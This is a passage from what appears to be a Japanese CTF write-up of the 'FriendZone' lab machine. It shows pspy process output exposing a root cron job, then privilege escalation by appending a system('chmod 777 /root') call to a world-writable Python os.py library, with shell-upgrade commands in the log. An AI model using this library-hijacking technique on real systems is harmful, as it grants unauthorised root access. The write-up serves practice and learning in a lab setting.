░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 1s and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/22 03:28:57 CMD: UID=0 PID=98 |
2020/06/22 03:28:57 CMD: UID=0 PID=9 |
2020/06/22 03:28:57 CMD: UID=0 PID=89 |
2020/06/22 03:28:57 CMD: UID=107 PID=861 | /usr/sbin/exim4 -bd -q30m
2020/06/22 03:28:57 CMD: UID=0 PID=854 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=852 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=851 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=85 |
2020/06/22 03:28:57 CMD: UID=0 PID=82 |
2020/06/22 03:28:57 CMD: UID=0 PID=81 |
2020/06/22 03:28:57 CMD: UID=0 PID=80 |
2020/06/22 03:28:57 CMD: UID=0 PID=8 |
2020/06/22 03:28:57 CMD: UID=0 PID=79 |
2020/06/22 03:28:57 CMD: UID=0 PID=78 |
2020/06/22 03:28:57 CMD: UID=0 PID=77 |
2020/06/22 03:28:57 CMD: UID=0 PID=726 | /usr/sbin/smbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=7 |
2020/06/22 03:28:57 CMD: UID=0 PID=6 |
2020/06/22 03:28:57 CMD: UID=33 PID=5740 | ./tmp/pspy64 -i 1000
2020/06/22 03:28:57 CMD: UID=33 PID=5737 | /bin/bash
2020/06/22 03:28:57 CMD: UID=33 PID=5736 | python3 -c import pty; pty.spawn("/bin/bash")
2020/06/22 03:28:57 CMD: UID=33 PID=5735 | /bin/sh -i
2020/06/22 03:28:57 CMD: UID=0 PID=5733 |
2020/06/22 03:28:57 CMD: UID=0 PID=5732 |
2020/06/22 03:28:57 CMD: UID=33 PID=5729 | sh -c uname -a; w; id; /bin/sh -i
2020/06/22 03:28:57 CMD: UID=0 PID=572 | /usr/sbin/nmbd --foreground --no-process-group
2020/06/22 03:28:57 CMD: UID=0 PID=566 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=5647 |
2020/06/22 03:28:57 CMD: UID=0 PID=564 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/06/22 03:28:57 CMD: UID=0 PID=5639 |
2020/06/22 03:28:57 CMD: UID=0 PID=562 | /usr/sbin/sshd -D
2020/06/22 03:28:57 CMD: UID=33 PID=5531 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=550 | /usr/sbin/vsftpd /etc/vsftpd.conf
2020/06/22 03:28:57 CMD: UID=33 PID=5497 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5484 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5481 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=5473 |
2020/06/22 03:28:57 CMD: UID=33 PID=5464 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5416 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5415 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=109 PID=541 | /usr/sbin/named -f -4 -u bind
2020/06/22 03:28:57 CMD: UID=33 PID=5383 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5364 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5351 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=33 PID=5320 | /usr/sbin/apache2 -k start
2020/06/22 03:28:57 CMD: UID=0 PID=4 |
2020/06/22 03:28:57 CMD: UID=0 PID=391 | /usr/lib/accountsservice/accounts-daemon
2020/06/22 03:28:57 CMD: UID=0 PID=390 | /usr/sbin/cron -f
2020/06/22 03:28:57 CMD: UID=102 PID=382 | /usr/sbin/rsyslogd -n
2020/06/22 03:28:57 CMD: UID=0 PID=381 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2020/06/22 03:28:57 CMD: UID=0 PID=379 | /lib/systemd/systemd-logind
2020/06/22 03:28:57 CMD: UID=0 PID=378 | /usr/bin/VGAuthService
2020/06/22 03:28:57 CMD: UID=103 PID=377 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/06/22 03:28:57 CMD: UID=0 PID=35 |
2020/06/22 03:28:57 CMD: UID=0 PID=34 |
2020/06/22 03:28:57 CMD: UID=0 PID=32 |
2020/06/22 03:28:57 CMD: UID=62583 PID=314 | /lib/systemd/systemd-timesyncd
2020/06/22 03:28:57 CMD: UID=101 PID=313 | /lib/systemd/systemd-resolved
2020/06/22 03:28:57 CMD: UID=0 PID=30 |
2020/06/22 03:28:57 CMD: UID=0 PID=29 |
2020/06/22 03:28:57 CMD: UID=0 PID=28 |
2020/06/22 03:28:57 CMD: UID=0 PID=27 |
2020/06/22 03:28:57 CMD: UID=0 PID=26 |
2020/06/22 03:28:57 CMD: UID=100 PID=254 | /lib/systemd/systemd-networkd
2020/06/22 03:28:57 CMD: UID=0 PID=252 | /lib/systemd/systemd-udevd
2020/06/22 03:28:57 CMD: UID=0 PID=25 |
2020/06/22 03:28:57 CMD: UID=0 PID=24 |
2020/06/22 03:28:57 CMD: UID=0 PID=233 | /lib/systemd/systemd-journald
2020/06/22 03:28:57 CMD: UID=0 PID=230 | /usr/bin/vmtoolsd
2020/06/22 03:28:57 CMD: UID=0 PID=23 |
2020/06/22 03:28:57 CMD: UID=0 PID=22 |
2020/06/22 03:28:57 CMD: UID=0 PID=21 |
2020/06/22 03:28:57 CMD: UID=0 PID=20 |
2020/06/22 03:28:57 CMD: UID=0 PID=2 |
2020/06/22 03:28:57 CMD: UID=0 PID=195 |
2020/06/22 03:28:57 CMD: UID=0 PID=194 |
2020/06/22 03:28:57 CMD: UID=0 PID=19 |
2020/06/22 03:28:57 CMD: UID=0 PID=18 |
2020/06/22 03:28:57 CMD: UID=0 PID=173 |
2020/06/22 03:28:57 CMD: UID=0 PID=172 |
2020/06/22 03:28:57 CMD: UID=0 PID=171 |
2020/06/22 03:28:57 CMD: UID=0 PID=17 |
2020/06/22 03:28:57 CMD: UID=0 PID=169 |
2020/06/22 03:28:57 CMD: UID=0 PID=168 |
2020/06/22 03:28:57 CMD: UID=0 PID=167 |
2020/06/22 03:28:57 CMD: UID=0 PID=16 |
2020/06/22 03:28:57 CMD: UID=0 PID=15 |
2020/06/22 03:28:57 CMD: UID=0 PID=14 |
2020/06/22 03:28:57 CMD: UID=0 PID=13 |
2020/06/22 03:28:57 CMD: UID=0 PID=12 |
2020/06/22 03:28:57 CMD: UID=0 PID=115 |
2020/06/22 03:28:57 CMD: UID=0 PID=11 |
2020/06/22 03:28:57 CMD: UID=0 PID=10 |
2020/06/22 03:28:57 CMD: UID=0 PID=1 | /sbin/init splash
2020/06/22 03:30:01 CMD: UID=0 PID=5750 | /bin/sh -c /opt/server_admin/reporter.py
2020/06/22 03:30:01 CMD: UID=0 PID=5749 | /bin/sh -c /opt/server_admin/reporter.py
2020/06/22 03:30:01 CMD: UID=0 PID=5748 | /usr/sbin/CRON -f/bin/sh -c /opt/server_admin/reporter.pyを見てみます
www-data@FriendZone:/$ cat /opt/server_admin/reporter.py
cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "[email protected]"
from_address = "[email protected]"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to [email protected] -from [email protected] -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/$ ls -la /opt/server_admin/reporter.py
ls -la /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16 2019 /opt/server_admin/reporter.py書き換えはできなさそうです。う〜んと眺めていると
www-data@FriendZone:/$ ls -la /usr/lib/python2.7/os.py
ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.pyimport している os.py の方に write の権限があります
import されてるだけで実行の効力があるのか分からんなぁと思いつつ
www-data@FriendZone:/$ echo "system('chmod 777 /root')" >> /usr/lib/python2.7/os.py
<'chmod 777 /root')" >> /usr/lib/python2.7/os.pyこれで/root の権限を変更するような追記をしました
www-data@FriendZone:/$ ls -la
ls -la
total 434908
drwxr-xr-x 22 root root 4096 Oct 5 2018 .
drwxr-xr-x 22 root root 4096 Oct 5 2018 ..
drwxr-xr-x 2 root root 4096 Oct 5 2018 bin
drwxr-xr-x 3 root root 4096 Oct 5 2018 boot
drwxr-xr-x 18 root root 3880 Jun 21 21:21 dev
drwxr-xr-x 90 root root 4096 Jan 23 2019 etc
drwxr-xr-x 3 root root 4096 Oct 5 2018 home
lrwxrwxrwx 1 root root 33 Oct 5 2018 initrd.img -> boot/initrd.img-4.15.0-36-generic
lrwxrwxrwx 1 root root 33 Oct 5 2018 initrd.img.old -> boot/initrd.img-4.15.0-36-generic
drwxr-xr-x 18 root root 4096 Jan 23 2019 lib
drwxr-xr-x 2 root root 4096 Oct 5 2018 lib64
drwx------ 2 root root 16384 Oct 5 2018 lost+found
drwxr-xr-x 2 root root 4096 Oct 5 2018 media
drwxr-xr-x 2 root root 4096 Oct 5 2018 mnt
drwxr-xr-x 3 root root 4096 Oct 6 2018 opt
dr-xr-xr-x 102 root root 0 Jun 21 21:21 proc
drwxrwxrwx 6 root root 4096 Jan 24 2019 root
drwxr-xr-x 24 root root 640 Jun 21 21:21 run
drwxr-xr-x 2 root root 4096 Jan 23 2019 sbin
drwxr-xr-x 3 root root 4096 Oct 5 2018 srv
-rw------- 1 root root 445255680 Oct 5 2018 swapfile
dr-xr-xr-x 13 root root 0 Jun 22 03:34 sys
drwxrwxrwt 2 root root 4096 Jun 22 03:13 tmp
drwxr-xr-x 10 root root 4096 Oct 5 2018 usr
drwxr-xr-x 12 root root 4096 Oct 6 2018 var
lrwxrwxrwx 1 root root 30 Oct 5 2018 vmlinuz -> boot/vmlinuz-4.15.0-36-generic
lrwxrwxrwx 1 root root 30 Oct 5 2018 vmlinuz.old -> boot/vmlinuz-4.15.0-36-generic
www-data@FriendZone:/$ cd root
cd root
www-data@FriendZone:/root$ cat root.txtしばらく待っていると root にアクセスできるようになりました。
終わりに
色んな enumration をしなきゃいけない&色んな可能性が考えられるって言うすごい良 machine でした
